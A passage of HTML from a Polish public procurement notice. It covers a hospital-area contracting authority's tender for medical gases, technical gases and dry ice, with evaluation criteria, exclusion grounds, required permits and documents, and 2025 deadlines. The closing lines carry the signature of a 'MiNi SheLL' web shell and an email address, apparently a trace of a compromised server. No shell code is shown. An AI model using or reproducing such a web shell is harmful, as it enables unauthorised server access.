class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1: najniższa zaoferowana wartość brutto pakietu / wartość brutto pakietu badanej oferty x 100 pkt. Wynik: Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Informacja o warunkach udziału w postępowaniu:<br/>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający uzna, iż Wykonawca spełnia warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jeżeli Wykonawca wykaże posiadanie:<br/>Dla pakietu 1: <br/>zezwolenie Głównego Inspektora Farmaceutycznego na wytwarzanie produktu leczniczego, jeżeli gazy medyczne wytwarzane są bezpośrednio przez Wykonawcę <br/>lub <br/>zezwolenie Głównego Inspektora Farmaceutycznego na prowadzenie hurtowni farmaceutycznej w zakresie obrotu gazami medycznymi, jeżeli Wykonawca jest dystrybutorem.<br/>Dla pakietu 3: <br/>zezwolenie Głównego Inspektora Farmaceutycznego na wytwarzanie produktu leczniczego, jeżeli gazy medyczne wytwarzane są bezpośrednio przez Wykonawcę<br/>lub <br/>zezwolenie Głównego Inspektora Farmaceutycznego na prowadzenie hurtowni farmaceutycznej w zakresie obrotu gazami medycznymi, jeżeli Wykonawca jest dystrybutorem.<br/>2. Dla wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>2.1. Zgodnie z art. 117 ust. 2 ustawy Pzp, warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej <br/>i zrealizuje dostawy, do których realizacji te uprawnienia są wymagane.<br/>2.2 W przypadku, o którym mowa w pkt 2.1, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona (przed wyborem najkorzystniejszej oferty), w celu potwierdzenia braku podstaw (przesłanek) wykluczenia z postępowania (określonych przez zamawiającego w Rozdziale 20 SWZ), na podstawie art. 274 ust. 1 ustawy Pzp zostanie wezwany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>w zakresie pakietów 1, 2 i 3:<br/>1.	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2023 r. poz. 1689 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (zgodnie z treścią załącznika nr 4 do SWZ); <br/>2.	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: <br/>a)	art. 108 ust. 1 pkt 1 ustawy Pzp, <br/>b)	art. 108 ust. 1 pkt 2 ustawy Pzp, <br/>c)	art. 108 ust. 1 pkt 3 ustawy Pzp, <br/>d)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienia publiczne tytułem środka karnego,<br/>e)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienia publiczne tytułem środka zapobiegawczego, <br/>f)	art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/>g)	art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>h)	art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>i)	art. 109 ust. 1 pkt 8 i 10 ustawy Pzp,<br/>j)	art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 poz. 835)<br/>(zgodnie z treścią załącznika nr 4 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona (przed wyborem najkorzystniejszej oferty), w celu potwierdzenia spełniania warunków udziału w postępowaniu (określonych przez zamawiającego w Rozdziale 21 SWZ), na podstawie art. 274 ust. 1 ustawy Pzp zostanie wezwany do złożenia <br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>w zakresie pakietów 1 i 3:<br/>1. zezwolenia, o którym mowa w Rozdziale 21 pkt 1 SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający w celu weryfikacji złożonych w postępowaniu przez Wykonawców ofert w zakresie spełniania postawionych w opisie przedmiotu zamówienia warunków wymaga złożenia przez Wykonawcę wraz z ofertą: 1. Dla pakietu 1, poz. 1: aktualne pozwolenie na dopuszczenie do obrotu produktu leczniczego i kartę charakterystyki produktu leczniczego. Przedmiotowe środki dowodowe sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. 2. Dla pakietu 3, poz. 1, 3, 5, 7: aktualne pozwolenie na dopuszczenie do obrotu produktu leczniczego i kartę charakterystyki produktu leczniczego. Przedmiotowe środki dowodowe sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. 3. Dla pakietu 3, poz. 9: dokument potwierdzający wpis do Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania zgodnie z ustawą o wyrobach medycznych z dnia 7 kwietnia 2022 r. w zakresie dwutlenku węgla medycznego, dokument potwierdzający, że zaoferowany przedmiot zamówienia jest zgodny z ustawą z dnia 7 kwietnia 2022 r. o wyrobach medycznych oraz dopuszczony do obrotu i stosowania w służbie zdrowia: Certyfikat CE/Deklaracja Zgodności – zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2017/745 z dnia 5 kwietnia 2017 r. w sprawie wyrobów medycznych, zmiany dyrektywy 2001/83/WE, rozporządzenia (WE) nr 178/2002 i rozporządzenia (WE) nr 1223/2009 oraz uchylenia dyrektyw Rady 90/385/EWG i 93/42/EWG i kartę charakterystyki substancji chemicznej lub niebezpiecznej. Przedmiotowe środki dowodowe sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. Dla pakietu 1, poz. 1: aktualne pozwolenie na dopuszczenie do obrotu produktu leczniczego i karta charakterystyki produktu leczniczego. Przedmiotowe środki dowodowe sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <br/>2. Dla pakietu 3, poz. 1, 3, 5, 7: aktualne pozwolenie na dopuszczenie do obrotu produktu leczniczego i karta charakterystyki produktu leczniczego. Przedmiotowe środki dowodowe sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>3. Dla pakietu 3, poz. 9: dokument potwierdzający wpis do Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania zgodnie z ustawą o wyrobach medycznych z dnia 7 kwietnia 2022 r. w zakresie dwutlenku węgla medycznego, dokument potwierdzający, że zaoferowany przedmiot zamówienia jest zgodny z ustawą z dnia 7 kwietnia 2022 r. o wyrobach medycznych oraz dopuszczony do obrotu i stosowania w służbie zdrowia: Certyfikat CE/Deklaracja Zgodności – zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2017/745 z dnia 5 kwietnia 2017 r. w sprawie wyrobów medycznych, zmiany dyrektywy 2001/83/WE, rozporządzenia (WE) nr 178/2002 i rozporządzenia (WE) nr 1223/2009 oraz uchylenia dyrektyw Rady 90/385/EWG i 93/42/EWG i karta charakterystyki substancji chemicznej lub niebezpiecznej. Przedmiotowe środki dowodowe sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ofertę składa się na Formularzu ofertowym zgodnie z załącznikiem nr 1 do SWZ. W przypadku, gdy wykonawca w<br/>złożonym Formularzu ofertowym w części dotyczącej poszczególnych pakietów nie uzupełni wymaganych dla danego<br/>pakietu danych, pozostawiając formularz w tej części całkowicie nieuzupełniony, zamawiający uzna, iż wykonawca nie złożył<br/>oferty na dany pakiet.<br/>2. Oferta oraz wszystkie załączniki wymagają podpisu osoby/osób uprawnionych do reprezentowania Wykonawcy.<br/>3. W przypadku podpisywania oferty przez osobę/y niewskazane w dokumencie rejestracyjnym (ewidencyjnym)<br/>Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo.<br/>4. Do oferty Wykonawca zobowiązany jest dołączyć oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków<br/>udziału w postępowaniu, w zakresie wskazanym w Rozdziałach 20 i 21 SWZ (załączniki nr 2 i 3 do SWZ), w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>5. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w pkt 4), składa<br/>każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w pkt 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, załączając jednocześnie do oferty udzielone pełnomocnictwo.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia opisano w projektach umów, które stanowią załączniki nr 5A, 5B, 5C i 5D do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-06 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://clo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-06 08:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej zawarto w Rozdziale 13 SWZ. 2) Opis sposobu przygotowania oferty zawarto w Rozdziale 17 SWZ. 3) Sposób składania ofert opisano w Rozdziale 18 pkt 18.1 SWZ. 4) Sposób obliczenia ceny opisano w Rozdziale 24 SWZ. 5) Informacje o formalnościach, jakie muszą zostać dopełnione po wyborze oferty w celu zawarcia umowy w sprawie zamówienia publicznego zawarto w Rozdziale 29 SWZ. 6) Termin wykonania zamówienia: Pakiet 1: Umowa zostaje zawarta na czas oznaczony i obowiązuje od dnia następnego po dacie zawarcia umowy przez kolejne 24 miesiące lub do wypłaty kwoty przeznaczonej na wynagrodzenie Wykonawcy, w zależności od tego, które z tych zdarzeń nastąpi pierwsze. Pakiet 2: Umowa zostaje zawarta na czas oznaczony i obowiązuje od dnia 24.07.2025 r. do dnia 31.05.2027 r. lub do wypłaty kwoty przeznaczonej na wynagrodzenie Wykonawcy, w zależności od tego, które z tych zdarzeń nastąpi pierwsze. Pakiet 3: Umowa zostaje zawarta na czas oznaczony i obowiązuje od dnia następnego po dacie zawarcia umowy przez kolejne 24 miesiące lub do wypłaty kwoty przeznaczonej na wynagrodzenie Wykonawcy, w zależności od tego, które z tych zdarzeń nastąpi pierwsze. 7) Podstawy wykluczenia, w tym podstawy wykluczenia, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835) opisano w Rozdziale 20 SWZ. 8) Dostawa: Dotyczy Pakietu 1: Wykonawca zobowiązuje się dostarczać zamówiony towar zgodnie z zamówieniem w czasie do 2 dni roboczych od daty zgłoszenia zamówienia (pisemnie, elektronicznie lub telefoniczne) zbiornika znajdującego się na terenie Zamawiającego przy ul. Jana Pawła II 2 w Siemianowicach Śląskich lub na podstawie wskazań telemetrii zainstalowanej przez Wykonawcę na zbiorniku. Dotyczy Pakietu 2: Wykonawca będzie dostarczał suchy lód w terminie do 2 dni od daty zgłoszenia zamówienia (pisemnie, telefonicznie, elektronicznie) do siedziby Zamawiającego przy ul. Jana Pawła II 2 w Siemianowicach Śląskich. Dotyczy Pakietu 3: Wykonawca zobowiązuje się dostarczać zamówione gazy medyczne i techniczne zgodnie z zamówieniem w czasie do 2 dni roboczych od daty zgłoszenia zamówienia do Zamawiającego przy ul. Jana Pawła II 2 w Siemianowicach Śląskich 9) Realizacja przedmiotu umowy następować będzie według rzeczywistych potrzeb Zamawiającego, a Wykonawca nie będzie wnosił żadnych roszczeń z tego tytułu, z zastrzeżeniem, iż co najmniej 60% wartości przedmiotu umowy zostanie zrealizowane. Zamawiającemu przysługuje prawo nie zrealizowania pozostałych 40% wartości przedmiotu umowy bez podawania przyczyny, a Wykonawca nie będzie wnosił żadnych roszczeń z tego tytułu. Za zgodą Wykonawcy Zamawiający może nie zrealizować więcej niż 40% wartości przedmiotu umowy, a Wykonawca nie będzie wnosił żadnych roszczeń z tego tytułu. 10) Przedmiot zamówienia musi spełniać wymagania określone w: a) ustawie z dnia 6 września 2001 r. Prawo Farmaceutyczne (t.j. Dz.U. z 2024 r. poz. 686 z późn. zm.); b) ustawie z dnia 7 kwietnia 2022 r. o wyrobach medycznych (t.j. Dz.U. z 2024 r. poz. 1620 z późn. zm.); c)	rozporządzeniu Rady Ministrów z dnia 7 grudnia 2012 r. w sprawie rodzajów urządzeń technicznych podlegających dozorowi technicznemu (Dz.U. 2012 r., poz. 1468); d) rozporządzenie Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 23 grudnia 2003 r. w sprawie bezpieczeństwa i higieny pracy przy produkcji i magazynowaniu gazów, napełnianiu zbiorników gazami oraz używaniu i magazynowaniu karbidu (Dz.U. 2004 r., Nr 7, poz. 59).

Creat By MiNi SheLL
Email: jattceo@gmail.com